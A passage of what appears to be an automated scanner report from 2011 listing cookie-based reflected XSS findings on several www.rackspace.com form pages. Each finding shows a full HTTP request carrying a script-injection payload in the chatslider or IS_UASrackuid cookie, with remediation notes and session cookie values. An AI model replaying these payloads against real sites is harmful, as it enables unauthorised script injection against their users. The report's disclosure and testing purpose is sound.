PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:52:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 37253
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc898"%3balert(1)//194a6baafc4 was submitted in the chatslider cookie. This input was echoed as bc898";alert(1)//194a6baafc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/logorequest.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dbc898"%3balert(1)//194a6baafc4; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c65a"><script>alert(1)</script>a727f401d10 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/logorequest.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D8c65a"><script>alert(1)</script>a727f401d10; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ab2d"%3balert(1)//c8c550a8316 was submitted in the IS_UASrackuid cookie. This input was echoed as 7ab2d";alert(1)//c8c550a8316 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/solutionpartnerapplication.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87ab2d"%3balert(1)//c8c550a8316; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8df"><script>alert(1)</script>9cf31486a17 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/solutionpartnerapplication.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f88a8df"><script>alert(1)</script>9cf31486a17; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f0f"%3balert(1)//c249d4a93d4 was submitted in the chatslider cookie. This input was echoed as 82f0f";alert(1)//c249d4a93d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/solutionpartnerapplication.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D82f0f"%3balert(1)//c249d4a93d4; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6151"><script>alert(1)</script>82ac6b2c10 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/solutionpartnerapplication.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df6151"><script>alert(1)</script>82ac6b2c10; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ad5"><script>alert(1)</script>663ea219130 was submitted in the IS_UASrackuid cookie. This input was echoed as a6ad5\"><script>alert(1)</script>663ea219130 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_knowledge/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a6ad5"><script>alert(1)</script>663ea219130; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd4c0</script><script>alert(1)</script>ffd93f2b131 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_knowledge/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8fd4c0</script><script>alert(1)</script>ffd93f2b131; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f4d5"><script>alert(1)</script>9d7ebbabc58 was submitted in the chatslider cookie. This input was echoed as 1f4d5\"><script>alert(1)</script>9d7ebbabc58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_knowledge/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1f4d5"><script>alert(1)</script>9d7ebbabc58; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24f3a</script><script>alert(1)</script>f7a96fbaeec was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_knowledge/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D24f3a</script><script>alert(1)</script>f7a96fbaeec; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e2d4"><script>alert(1)</script>dd6bddd1a07 was submitted in the IS_UASrackuid cookie. This input was echoed as 7e2d4\"><script>alert(1)</script>dd6bddd1a07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_knowledge/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87e2d4"><script>alert(1)</script>dd6bddd1a07; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb22</script><script>alert(1)</script>c05645a3c2e was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_knowledge/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f88eb22</script><script>alert(1)</script>c05645a3c2e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; 